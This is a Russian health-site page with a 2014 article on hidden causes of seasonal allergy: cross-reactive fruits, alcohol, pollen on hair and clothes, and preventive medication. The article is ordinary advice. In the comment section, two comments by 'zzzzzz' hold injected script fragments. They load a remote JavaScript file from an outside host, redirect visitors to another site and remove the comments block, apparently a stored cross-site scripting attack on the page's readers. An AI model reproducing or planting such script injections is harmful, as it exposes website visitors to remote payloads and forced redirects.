Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нежданные причины аллерги...  >>  Нежданные причины аллергии
 
Обратная связь
 

Нежданные причины аллергии

Размер шрифта
16 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Откажитесь от этих привычек, которые могут усугубить вашу аллергию.

Нежданные причины аллергии

Аллергия может разрушить прекрасный день, повысить раздражительность, усилить насморк. Недавнее исследование показывает, что симптомы аллергии заставляют нас чувствовать себя непривлекательными, капризными и замкнутыми. На самом деле, ваши ежедневные привычки могут стать причиной всех ваших злоключений с аллергией.

Неправильная диета

Во время сезонной аллергии определенные фрукты и орехи могут вызвать аллергическую реакцию, так называемый синдром пищевой аллергии. Считайте, что это случай ошибочной идентификации. Когда уровень пыльцы высок, ваш организм сверхчувствителен ко всему, что напоминает ваш аллерген, и, к сожалению, белки фруктов и пыльцы схожи.

Например, люди с аллергией на пыльцу березы или ольхи могут страдать от аллергии на яблоки, морковь, сельдерей, орехи, персики, вишни и груши. Кроме того, аллергия на траву может привести к реакции на употребление томатов. Если вы не хотите отказываться от своего любимого фрукта, то запеките его или очистите от кожицы, это поможет избавиться от белков, запускающих аллергию.

Во всем виновато вино

Мы не хотим портить все веселье, но исследования показывают связь между употреблением алкоголя и аллергией: выпиваете более одного напитка в день – получаете более сильную аллергическую реакцию. Это может быть связано с тем, что регулярное потребление алкоголя вызывает аномальный иммунный ответ. Поэтому на время обострения сезонной аллергии желательно отказаться от употребления алкогольной продукции.

Оставайтесь инкогнито

Когда вы находитесь на свежем воздухе, вы и ваша одежда открыты для пыльцы. Ваша миссия состоит в том, чтобы удержать ее как можно дальше от вашего лица. Носите солнцезащитные очки и шляпу, когда вы на улице, это убережет ваше лицо, ресницы и веки от аллергенов, где они вызывают наибольшее раздражение.

Волосы – это магнит для пыльцы, поэтому если ваши локоны длинные, сделайте прическу, которую можно легко спрятать под шляпку. Держите окна в автомобиле и дома закрытыми, используйте кондиционер и увлажнитель воздуха.

Прачечная – это не лучшая идея

Не экономьте силы на стирке или мытье полов во время разгара сезонной аллергии. Ваш дом должен быть безопасным убежищем, поэтому следуйте этим простым советам. Перед тем, как войти в помещение, избавьте свою верхнюю одежду от пыльцы, хорошенько встряхнув ее. Оказавшись внутри, разденьтесь и оставьте остальную часть вашей одежды в корзине для белья.

Кроме того, соблюдайте правила гигиены сна: обязательный душ перед сном или, по крайней мере, мойте волосы и лицо перед тем, как лечь в постель. Таким образом, вы не будете спать всю ночь напролет с пыльцой, которая раздражает кожу и дыхательные пути. И никогда не ложитесь спать, не меняя вашу дневную одежду.

Правильное лечение

Лекарства от аллергии могут быть дорогими, или вам просто не нравится их эффект. Независимо от причины, если вы тянетесь к лекарствам только тогда, когда больше невозможно терпеть симптомы аллергии, то это заранее проигранная партия. Некоторые лекарства от аллергии действуют профилактически, поэтому их стоит принимать еще до начала сезонной аллергии. Если вы сомневаетесь в каком-либо препарате, обратитесь к врачу для назначения оптимального курса лечения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 июня 2014 в 15:13

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда о соплях   Жирная еда делает вас стервой!   Старт нового сезона проекта «Сбрось лишнее»   Аллергия и мигрень связаны!  
06 июня 2013Ваши сопли скажут, сумасшедший ли вы 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Как снова хотеть секса
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.